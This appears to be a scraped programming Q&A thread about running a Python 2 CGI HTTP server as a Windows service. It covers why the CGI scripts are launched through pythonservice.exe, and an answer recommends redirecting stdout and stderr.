import BaseHTTPServer
import CGIHTTPServer
import copy
import os
import select
import SimpleHTTPServer
import sys
import time
import threading
import urllib
from signal import SIGTERM
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
from SocketServer import ThreadingMixIn
class ThreadedHTTPServer(ThreadingMixIn, HTTPServer):
pass
class RequestHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
have_fork = hasattr(os, 'fork')
have_popen2 = hasattr(os, 'popen2')
have_popen3 = hasattr(os, 'popen3')
rbufsize = 0
def do_POST(self):
if self.is_cgi():
self.run_cgi()
else:
self.send_error(501, "Can only POST to CGI scripts")
def send_head(self):
if self.is_cgi():
return self.run_cgi()
else:
return SimpleHTTPServer.SimpleHTTPRequestHandler.send_head(self)
def is_cgi(self):
splitpath = _url_collapse_path_split(self.path)
if splitpath[0] in self.cgi_directories:
self.cgi_info = splitpath
return True
return False
cgi_directories = ['/cgi-bin', '/htbin']
def is_executable(self, path):
return executable(path)
def is_python(self, path):
head, tail = os.path.splitext(path)
return tail.lower() in (".py", ".pyw")
def run_cgi(self):
path = self.path
dir, rest = self.cgi_info
i = path.find('/', len(dir) + 1)
while i >= 0:
nextdir = path[:i]
nextrest = path[i+1:]
scriptdir = self.translate_path(nextdir)
if os.path.isdir(scriptdir):
dir, rest = nextdir, nextrest
i = path.find('/', len(dir) + 1)
else:
break
i = rest.rfind('?')
if i >= 0:
rest, query = rest[:i], rest[i+1:]
else:
query = ''
i = rest.find('/')
if i >= 0:
script, rest = rest[:i], rest[i:]
else:
script, rest = rest, ''
scriptname = dir + '/' + script
scriptfile = self.translate_path(scriptname)
if not os.path.exists(scriptfile):
self.send_error(404, "No such CGI script (%r)" % scriptname)
return
if not os.path.isfile(scriptfile):
self.send_error(403, "CGI script is not a plain file (%r)" %
scriptname)
return
ispy = self.is_python(scriptname)
if not ispy:
if not (self.have_fork or self.have_popen2 or self.have_popen3):
self.send_error(403, "CGI script is not a Python script (%r)" %
scriptname)
return
if not self.is_executable(scriptfile):
self.send_error(403, "CGI script is not executable (%r)" %
scriptname)
return
# Reference: http://hoohoo.ncsa.uiuc.edu/cgi/env.html
# XXX Much of the following could be prepared ahead of time!
env = {}
env['SERVER_SOFTWARE'] = self.version_string()
env['SERVER_NAME'] = self.server.server_name
env['GATEWAY_INTERFACE'] = 'CGI/1.1'
env['SERVER_PROTOCOL'] = self.protocol_version
env['SERVER_PORT'] = str(self.server.server_port)
env['REQUEST_METHOD'] = self.command
uqrest = urllib.unquote(rest)
env['PATH_INFO'] = uqrest
env['PATH_TRANSLATED'] = self.translate_path(uqrest)
env['SCRIPT_NAME'] = scriptname
if query:
env['QUERY_STRING'] = query
host = self.address_string()
if host != self.client_address[0]:
env['REMOTE_HOST'] = host
env['REMOTE_ADDR'] = self.client_address[0]
authorization = self.headers.getheader("authorization")
if authorization:
authorization = authorization.split()
if len(authorization) == 2:
import base64, binascii
env['AUTH_TYPE'] = authorization[0]
if authorization[0].lower() == "basic":
try:
authorization = base64.decodestring(authorization[1])
except binascii.Error:
pass
else:
authorization = authorization.split(':')
if len(authorization) == 2:
env['REMOTE_USER'] = authorization[0]
# XXX REMOTE_IDENT
if self.headers.typeheader is None:
env['CONTENT_TYPE'] = self.headers.type
else:
env['CONTENT_TYPE'] = self.headers.typeheader
length = self.headers.getheader('content-length')
if length:
env['CONTENT_LENGTH'] = length
referer = self.headers.getheader('referer')
if referer:
env['HTTP_REFERER'] = referer
accept = []
for line in self.headers.getallmatchingheaders('accept'):
if line[:1] in "\t\n\r ":
accept.append(line.strip())
else:
accept = accept + line[7:].split(',')
env['HTTP_ACCEPT'] = ','.join(accept)
ua = self.headers.getheader('user-agent')
if ua:
env['HTTP_USER_AGENT'] = ua
co = filter(None, self.headers.getheaders('cookie'))
if co:
env['HTTP_COOKIE'] = ', '.join(co)
# XXX Other HTTP_* headers
# Since we're setting the env in the parent, provide empty
# values to override previously set values
for k in ('QUERY_STRING', 'REMOTE_HOST', 'CONTENT_LENGTH',
'HTTP_USER_AGENT', 'HTTP_COOKIE', 'HTTP_REFERER'):
env.setdefault(k, "")
os.environ.update(env)
self.send_response(200, "Script output follows")
decoded_query = query.replace('+', ' ')
if self.have_fork:
# Unix -- fork as we should
args = [script]
if '=' not in decoded_query:
args.append(decoded_query)
nobody = nobody_uid()
self.wfile.flush() # Always flush before forking
pid = os.fork()
if pid != 0:
# Parent
pid, sts = os.waitpid(pid, 0)
# throw away additional data [see bug #427345]
while select.select([self.rfile], [], [], 0)[0]:
if not self.rfile.read(1):
break
if sts:
self.log_error("CGI script exit status %#x", sts)
return
# Child
try:
try:
os.setuid(nobody)
except os.error:
pass
os.dup2(self.rfile.fileno(), 0)
os.dup2(self.wfile.fileno(), 1)
os.execve(scriptfile, args, os.environ)
except:
self.server.handle_error(self.request, self.client_address)
os._exit(127)
else:
# Non Unix - use subprocess
import subprocess
cmdline = [scriptfile]
if self.is_python(scriptfile):
interp = sys.executable
if interp.lower().endswith("w.exe"):
# On Windows, use python.exe, not pythonw.exe
interp = interp[:-5] + interp[-4:]
cmdline = [interp, '-u'] + cmdline
if '=' not in query:
cmdline.append(query)
self.log_message("command: %s", subprocess.list2cmdline(cmdline))
try:
nbytes = int(length)
except (TypeError, ValueError):
nbytes = 0
p = subprocess.Popen(cmdline,
stdin = subprocess.PIPE,
stdout = subprocess.PIPE,
stderr = subprocess.PIPE
)
if self.command.lower() == "post" and nbytes > 0:
data = self.rfile.read(nbytes)
else:
data = None
# throw away additional data [see bug #427345]
while select.select([self.rfile._sock], [], [], 0)[0]:
if not self.rfile._sock.recv(1):
break
stdout, stderr = p.communicate(data)
self.wfile.write(stdout)
if stderr:
self.log_error('%s', stderr)
status = p.returncode
if status:
self.log_error("CGI script exit status %#x", status)
else:
self.log_message("CGI script exited OK")
def _url_collapse_path_split(path):
path_parts = []
for part in path.split('/'):
if part == '.':
path_parts.append('')
else:
path_parts.append(part)
# Filter out blank non trailing parts before consuming the '..'.
path_parts = [part for part in path_parts[:-1] if part] + path_parts[-1:]
if path_parts:
tail_part = path_parts.pop()
else:
tail_part = ''
head_parts = []
for part in path_parts:
if part == '..':
head_parts.pop()
else:
head_parts.append(part)
if tail_part and tail_part == '..':
head_parts.pop()
tail_part = ''
return ('/' + '/'.join(head_parts), tail_part)
nobody = None
def nobody_uid():
"""Internal routine to get nobody's uid"""
global nobody
if nobody:
return nobody
try:
import pwd
except ImportError:
return -1
try:
nobody = pwd.getpwnam('nobody')[2]
except KeyError:
nobody = 1 + max(map(lambda x: x[2], pwd.getpwall()))
return nobody
def executable(path):
"""Test for executable file."""
try:
st = os.stat(path)
except os.error:
return False
return st.st_mode & 0111 != 0
Handler = RequestHandler
PORT = 7998
ADDRESS = "0.0.0.0"
httpd = ThreadedHTTPServer((ADDRESS, PORT), Handler)
print "serving at %s:%s" % (ADDRESS, PORT)
import os
import SocketServer
import BaseHTTPServer
import SimpleHTTPServer
import xmlrpclib
import SimpleXMLRPCServer
import socket
import httplib
import inspect
import win32service
import win32serviceutil
import win32api
import win32con
import win32event
import win32evtlogutil
class XMLRPCServerService(win32serviceutil.ServiceFramework):
_svc_name_ = "XMLRPCServerService"
_svc_display_name_ = "XMLRPCServerService"
_svc_description_ = "Tests Python service framework by receiving and echoing messages over a named pipe"
def __init__(self, args):
win32serviceutil.ServiceFramework.__init__(self, args)
self.hWaitStop = win32event.CreateEvent(None, 0, 0, None)
def SvcStop(self):
self.ReportServiceStatus(win32service.SERVICE_STOP_PENDING)
self.ReportServiceStatus(win32service.SERVICE_STOPPED)
win32event.SetEvent(self.hWaitStop)
def SvcDoRun(self):
import servicemanager
servicemanager.LogMsg(servicemanager.EVENTLOG_INFORMATION_TYPE,servicemanager.PYS_SERVICE_STARTED,(self._svc_name_, ''))
self.timeout = 100
while 1:
rc = win32event.WaitForSingleObject(self.hWaitStop, self.timeout)
if rc == win32event.WAIT_OBJECT_0:
servicemanager.LogInfoMsg("XMLRPCServerService - STOPPED")
break
else:
httpd.serve_forever()
servicemanager.LogInfoMsg("XMLRPCServerService - is alive and well")
def ctrlHandler(ctrlType):
return True
if __name__ == '__main__':
win32api.SetConsoleCtrlHandler(ctrlHandler, True)
win32serviceutil.HandleCommandLine(XMLRPCServerService)
Any clues where I am going wrong ? Or good way to implement it (May be w/o using service).
Strict Note:
Solution must be in Python 2.6 (Project requirements).
Updates:
I saw some weird thing in log:python service.py debug
127.0.0.1 - - [04/Apr/2014 09:41:04] command: C:\Python27\Lib\site-packages\win3
2\**pythonservice.exe** -u C:\CONSOLE-CGI\cgi-bin\login.py ""
Why is executing CGI script using pythonservice.exe?
What am I missing Here?
More updates:
Code snippet from daemon process python script
#Non Unix - use subprocess
import subprocess
cmdline = [scriptfile]
if self.is_python(scriptfile):
#interp = sys.executable // here it return pythonservice.exe
interp = "python.exe" // if I hardcode it to python.exe all goes fine
if interp.lower().endswith("w.exe"): #On Windows,use python.exe,not pythonw.exe
interp = interp[: -5] + interp[-4: ]
cmdline = [interp, '-u'] + cmdline
Any clues why is so??
You may need to redirect all the output since Windows scheduler has some issues doing this in pythonw case. Process does start properly, but no action being done and server does not respond without redirecting stdout and stderr.
import http.server
import socketserver
import sys
PORT = 1234
Handler = http.server.SimpleHTTPRequestHandler
if __name__ == '__main__':
sys.stdout = open('out.txt', 'w')
sys.stderr = open('err.txt', 'w')
with socketserver.TCPServer(("", PORT), Handler) as httpd:
print("serving at port %d" % PORT, flush=True)
httpd.serve_forever()

Categories

Resources